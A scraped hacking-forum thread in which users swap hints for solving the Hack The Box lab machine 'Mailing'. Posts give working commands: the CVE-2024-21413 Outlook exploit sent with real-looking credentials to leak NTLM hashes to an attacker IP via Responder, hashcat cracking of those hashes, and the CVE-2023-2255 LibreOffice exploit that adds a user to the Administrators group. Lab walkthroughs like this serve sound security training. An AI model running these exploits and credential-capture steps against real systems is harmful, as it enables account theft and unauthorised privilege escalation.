May 05, 2024, 08:08 AM
|
HTB - Mailing
by trevor69000 - Saturday May 4, 2024 at 06:43 PM
|
(May 05, 2024, 08:08 AM)x0x31a Wrote:trevor69000 dateline='[url=tel:1714859183' Wrote: 1714859183[/url]'] U get this credentials by cracking the ntlm hash from CVE-2024-21413 with responder. https://github.com/xaitax/CVE-2024-21413...me-ov-file (May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get how did u come up with the cve? Just assuming because there is a mailserver and a instruction on how to setup a mail client or any specific hints to find with lfi? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching. (May 05, 2024, 01:05 AM)s1nn Wrote: For those that haven't rooted: After the " python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt' " and " net user maya" showing the Administradores group, exit from the evil-winrm windows shell and evil-winrm with maya again. With this new shell maya will be able to get the root flag from localadmin directory. Nevertheless cracpmapexec and impacket-wmiexec is a good path to get the root flag.
May 05, 2024, 12:30 PM
(May 04, 2024, 10:46 PM)DataNinja Wrote:(May 04, 2024, 10:11 PM)heyitswilson Wrote: any hint for root how did u know if machine vulnerable with this exploit?? even in this machine is not installing libreoffice??
May 05, 2024, 12:36 PM
for getting the plaintext password from responder ntml hash
hashcat -m 5600 ntmlhash.txt rockyou.txt
how do you came up with the Important Documents folder?
I can see the ps script in the localadmin documents directory but found no scheduled task with maya user. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
May 05, 2024, 01:55 PM
(May 05, 2024, 12:00 PM)ipfi Wrote:(May 05, 2024, 08:08 AM)x0x31a Wrote:trevor69000 dateline='[url=tel:1714859183' Wrote: 1714859183[/url]'] I always take a look in the program files directory to see what is on the machine. From there I could see that LibreOffice was installed and hence the CVE. That's how I got to that part anyway.
May 05, 2024, 03:24 PM
(May 04, 2024, 09:17 PM)s1nn Wrote:(May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get i cant get any result to my responder, is there anything to do? help me This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect. (May 05, 2024, 03:24 PM)marco1337 Wrote:(May 04, 2024, 09:17 PM)s1nn Wrote:(May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get have no idea why , but it didn't work for me as well . the code below worked python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<ip>\something' --subject XD --url '\\<ip>\something' -- added something to url
May 05, 2024, 03:34 PM
|
|
« Next Oldest | Next Newest »
|
![[Image: AzgzHri.png]](https://i.imgur.com/AzgzHri.png)
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,176 |
1 hour ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,494 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
[FREE] HackTheBox All Cheatsheets | 3 | 397 |
Yesterday, 10:36 PM Last Post: op334 |
|
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 369 | 92,013 |
Yesterday, 04:10 PM Last Post: sabbyahmed |
||
| CBBH Write Ups | 22 | 6,229 |
Yesterday, 06:39 AM Last Post: Usercomplex |
||